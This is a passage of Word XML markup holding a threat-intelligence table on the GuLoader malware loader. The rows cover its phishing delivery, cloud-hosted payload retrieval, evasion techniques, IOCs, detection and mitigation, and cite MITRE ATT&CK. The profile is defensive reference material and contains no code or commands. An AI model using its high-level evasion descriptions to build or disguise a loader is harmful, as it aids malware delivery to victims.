            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="3BEE2610" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A781787" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Execution Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C2B8084" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Usually delivered via phishing attachments or malicious documents. Once executed, GuLoader downloads encrypted payloads from cloud services and injects them directly into memory using reflective loading techniques.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="26895820" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A37130C" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Persistence Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DE28807" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>GuLoader itself generally focuses on payload delivery rather than persistence; persistence is usually established by the secondary malware payload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="29E577C4" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E068688" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B64177A" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No direct privilege escalation capability commonly documented for GuLoader itself. Secondary payloads may perform escalation activities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="18C526CE" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="633068E0" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53344EF0" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Uses heavy obfuscation, anti-analysis checks, encrypted shellcode, process injection, reflective loading, API hashing, and cloud-hosted payload retrieval to bypass security tools.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4D648621" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E6E699A" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CD61EB3" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">GuLoader itself does not directly steal credentials but frequently delivers credential-stealing malware such as Agent Tesla, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>FormBook</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>LokiBot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">, and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Remcos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> RAT.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="302E4778" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="247A764F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Discovery Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="091971C5" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Limited native discovery functionality; primary purpose is malware delivery and execution staging.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="6B8825AA" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A788335" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C4E866E" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No significant lateral movement functionality documented within GuLoader itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="31CB5C04" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6119E6C3" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Command &amp; Control (C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39B6B85B" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Uses HTTP/HTTPS communications to retrieve payloads from legitimate cloud storage providers and attacker-controlled infrastructure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="245D575B" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6195E0F0" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DE34F12" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>GuLoader itself does not directly exfiltrate data; delivered payloads often handle data theft and exfiltration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4DDA8161" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BED1487" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Impact Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41394A0C" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Enables stealthy malware delivery, increases infection success rates through cloud infrastructure abuse, bypasses traditional signature-based defenses, and supports large-scale phishing operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0FC23A26" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52A249F8" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Indicators of Compromise (IOCs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36FC7FDE" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Suspicious cloud-storage downloads, heavily obfuscated executables, unusual process injection activity, PowerShell abuse, encrypted network traffic to cloud services, reflective DLL loading, and malicious email attachments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="7AF2772B" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="293D76C2" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Detection &amp; Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3601B7BC" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Monitor outbound connections to cloud services, detect reflective code loading, enable EDR memory analysis, block malicious macros and phishing attachments, use sandbox analysis, apply application whitelisting, and monitor abnormal process injection behaviors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0F034E31" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42D29E96" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>References &amp; Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="251AC4F9" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:hyperlink r:id="rId23" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK GuLoader S0561</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
